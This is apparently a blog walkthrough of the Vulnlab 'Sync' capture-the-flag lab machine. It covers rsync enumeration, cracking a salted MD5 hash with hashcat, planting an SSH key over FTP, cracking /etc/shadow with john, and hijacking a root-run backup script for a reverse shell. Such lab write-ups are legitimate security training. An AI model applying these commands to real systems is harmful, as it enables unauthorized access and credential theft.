Post

VL - Sync

Posted Updated
By Bushidosan 3 min read

Enumeration

NMap showed the following ports open:

1
2
3
4
5

21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
873/tcp  open  rsync
8000/tcp open  http-alt

By visiting the webpage we noticed a simple login page which we could bypass with a basic SQLi injection but the page itself doesn’t contain anything of interst.

FTP did not support anonymous logon so the only port left is rsync. We can connect via netcat to the rsync server and interect with it:

1

nc -vn <target> 873

One thing to note is that the first message should be a copy paste of the message it gives you:

1

@RSYNCD: 31.0 sha512 sha256 sha1 md5 md4

From here we can ask information such as the list with shares:

1

#list

The sessions gets closed but if we open it again and “enumerate” the share we don’t get an error message with AUTHREQD back meaning that it is an unauthenticated share. We can use rsync to connect to it and list all files.

1

rsync -av --list-only rsync://<target>:873/httpd

This reveals a list with files which we can download with the following command:

1

rsync -av rsync://<target>:873/httpd <output directory>

We can not upload to the share as the share is in read only mode.

Triss

Now we got our hands on the source code AND the database of the application, in the database resides the hashed password of both the Admin and Triss user. Lets take a look at the source code to figure out how the application works. index.php reveals how the passwords gets hashed:

1

$hash = md5("$secure|$username|$password");

One of the first lines contains the $secure value 6c4972f3xxxxxxx2ad3105de01e, we got 2 of the 3 requirments to get the password of the user Triss. We can use hashcat to crack the MD5 hash with the salt but first we need to make it compatible with hashcat

1

<DB HASH>:6c497XXXXXXXXXXXX3105de01e|triss|

Now we can use hashcat to try crack the hash:

1

hashcat -a 0 -m 20 hash.txt /usr/share/SecLists/Passwords/Leaked-Databases/rockyou-75.txt

-m 20 stands for SALT.HASH, which is required as earlier stated in the source code. Since we got the password we can try to SSH into the Triss user but this fails as an SSH key is required. We can try login with FTP now since we got credentials.

If we run ls -la we see a structure of a home directorie meaning if we can write in this directory we can make a .ssh directory with a authorized_keys file with our own public key in it:

1
2

mkdir .ssh
put /home/<user>/.ssh/<public.key>

Doing basic enumeration we noticed the /backup directory with zip files owned by root, we can transfer these over with python3 -m http.server and unzip them. It contains both the /etc/passwd as the /etc/shadow files which we can use to crack some more password!

1

unshadow passwd shadow > unshadow

With john we can now crack some hashes!

1
2
3
4
5

└─# john --format=crypt unshadow.db --wordlist=/usr/share/SecLists/Passwords/Leaked-Databases/rockyou-75.txt 
saXXXXXra           (sa)     
geXXXXXld           (jennifer)     
geXXXXXld           (triss)

SA / Root

We can su into the Jennifer user and retrieve the user.txt flag and hop directly over to the SA user.

Running linpeas revealed some intersting files like the following:

1

-rwxr-xr-x 1 sa sa 211 Apr 19 19:26 /usr/local/bin/backup.sh

Earlier we retrieved ZIP files with a timestamp which gets created by this script, we can edit this script and add a reverse shell to it and become root!

Vulnlab
CTF Linux Rsync Code Review
This post is licensed under CC BY 4.0 by the author.